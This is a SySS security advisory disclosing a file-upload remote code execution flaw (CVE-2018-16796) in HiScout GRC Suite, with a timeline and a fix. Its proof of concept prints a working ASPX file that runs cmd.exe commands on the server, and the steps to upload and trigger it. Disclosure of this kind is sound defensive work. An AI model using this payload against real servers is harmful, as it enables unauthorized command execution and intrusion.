Advisory ID: SYSS-2018-015 Product: HiScout GRC Suite Manufacturer: HiScout GmbH Affected Version(s): < 3.1.5 Tested Version(s): 3.1.3.12 Vulnerability Type: Unrestricted Upload of File with Dangerous Type Risk Level: High Solution Status: Fixed Manufacturer Notification: 2018-07-26 Solution Date: 2018-09-03 Public Disclosure: 2018-09-12 CVE Reference: CVE-2018-16796 Author of Advisory: Sebastian Auwaerter, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: HiScout GRC Suite is a platform for managing IT governance, risk and compliance. The manufacturer describes the various modules of the product as follows (see [1]): The HiScout ISM module is geared toward meeting the requirements of the ISO 27000 series of international standards, and provides a reliable basis for the information management systems control loop. The HiScout Grundschutz module fully supports operations toward BSI standard 100-2. HiScout Grundschutz comes geared to BSI specifications and can smoothly incorporate existing data from other tools, such as GSTOOL. The HiScout BCM module is a new generation of BCM tools that can generate quantifiable benefits even when there is no emergency, and is therefore not only used to help you to plan for circumstances that will hopefully never arise. Due to a missing check of the file extension and the content of uploaded files in place of an image, HiScout GRC Suite is vulnerable to a remote code execution vulnerability. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: An authenticated attacker with the permission to edit or add a "WebSiteElement" to the "content" pages is able to upload any file with any file extension to the data directory of the application. This directory is in the web root and the uploaded file is executed on the server if ".aspx" is chosen as the file extension and if the file contains aspx source code. Any commands can be executed with the permissions of the web server user on the server by exploiting this vulnerability. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC) To reproduce this issue on a German instance of HiScout GRC Suite, choose "Inhalte" -> "Neu" -> "WebSiteElement" (The english equivalent is "Content" -> "New" -> "WebSiteElement") and upload the following file to the file upload on the right-hand side of the "InfoEditor": filename: whoami.aspx ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <%@ Page Language="C#" Debug="true" Trace="false" %> <%@ Import Namespace="System.Diagnostics" %> <%@ Import Namespace="System.IO" %> Code Execution PoC <% String a = "whoami"; ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = "cmd.exe"; psi.Arguments = "/c "+ a; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; Process p = Process.Start(psi); StreamReader stmrdr = p.StandardOutput; String s = stmrdr.ReadToEnd(); stmrdr.Close(); Response.Write("
  • "); Response.Write(s); Response.Write("
  • "); %> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Now, either visit the uploaded file by navigating to http(s):////whoami.aspx or open the page where the newly created "WebSiteElement" is shown and follow the path of the "image" that is not loaded properly. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update to software version to 3.1.5 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2018-07-25: Vulnerability discovered 2018-07-26: Vulnerability reported to manufacturer 2018-09-03: Patch released by manufacturer 2018-09-12: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for HiScout BCM https://www.hiscout.com/en/ [2] SySS Security Advisory SYSS-2018-015 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-015.txt [3] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Sebastian Auwaerter of SySS GmbH. E-Mail: sebastian.auwaerter at syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Sebastian_Auwaerter.asc Key Fingerprint: F98C 3E12 6713 19D9 9E2F BE3E E9A3 0D48 E2F0 A8B6 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en